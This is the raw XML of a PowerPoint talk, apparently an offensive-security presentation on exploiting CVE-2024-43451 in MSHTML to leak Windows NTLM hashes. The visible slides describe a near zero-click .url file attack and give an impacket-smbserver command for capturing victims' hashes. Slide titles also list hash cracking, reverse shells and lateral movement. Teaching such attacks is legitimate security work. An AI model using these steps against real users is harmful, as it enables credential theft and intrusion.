              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Maybe you should listen during Jack’s talks!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Basically, it’s a crusty, dusty, but still lingering, method used for authentication in Windows environments that is supposed to prevent user’s passwords being sent across a network. However, it is crap.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2691909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20F30D-39FC-724E-86DA-04758413138F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="847725"/>
            <a:ext cx="10515600" cy="5162549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The vulnerability can be exploited by a victim simply; dragging and dropping (moving), right clicking, deleting, or in some cases just hovering over the file, making it (nearly) a zero-click exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It was all due to a vulnerability in MSHTML which is a proprietary browser engine used in the Windows version of Internet Explorer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet Explorer is almost as bad as DNS at causing issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4161988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51E54-1DA6-6FD2-E36F-18A7BB983B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The exploit…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9158C99-6E75-1838-836A-D1CF6216B0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="6627" t="9311" r="6832" b="9035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2160650" y="1549400"/>
            <a:ext cx="7870700" cy="5195202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2845292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71B96-20CC-69F4-81D1-E4C7358B8313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where the NTLM’s at?!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9553A89B-207A-5B6C-2317-F3F9A69D3DDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You’ve got the exploit prepared, now you need a way to capture the hashes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are two tools you can use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket-smbserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>responder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both can be used to act as an SMB server and capture NTLM hashes when a victim machine attempts to authenticate with them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="557651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74243-F37D-66BB-7229-2988A22C8225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket-smbserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E6A101-5BE2-4B35-5441-6FC5D491B54C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impacket’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> script you need to setup a couple of things. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The first being a directory which you can point to as your SMB share and the second being any random file to act as the “target” file that your exploit script will attempt to download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once you’ve got those setup, run the command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>impacket-smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –smb2support Files /path/to/share</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>That’s it, once everything is setup and the victim interacts with the URL file, you’ll start gathering their NTLM hashes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25515200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166</TotalTime>
  <Words>930</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>69</Paragraphs>
  <Slides>21</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Aptos Display</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Exploiting CVE-2024-43451 NTLM Hash Disclosure</vt:lpstr>
      <vt:lpstr>WTF is CVE-2024-43451?</vt:lpstr>
      <vt:lpstr>So… WTF is NTLM?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The exploit…</vt:lpstr>
      <vt:lpstr>Where the NTLM’s at?!</vt:lpstr>
      <vt:lpstr>impacket-smbserver</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>responder </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Is that it?</vt:lpstr>
      <vt:lpstr>You can crack the hashes! (sometimes)</vt:lpstr>
      <vt:lpstr>Cool, I got their password, it’s not as if I’m sat at their PC and I can login…</vt:lpstr>
      <vt:lpstr>REVERSE SHELLSSSSSSSS!!!!!</vt:lpstr>
      <vt:lpstr>Generating Reverse Shells</vt:lpstr>
      <vt:lpstr>Exploit Modification</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Privilege Escalation or Lateral Movement</vt:lpstr>
      <vt:lpstr>The End + Shameless Plug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Adam Firth</dc:creator>
  <cp:lastModifiedBy>Adam Firth</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-05T17:06:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-05T19:53:08Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>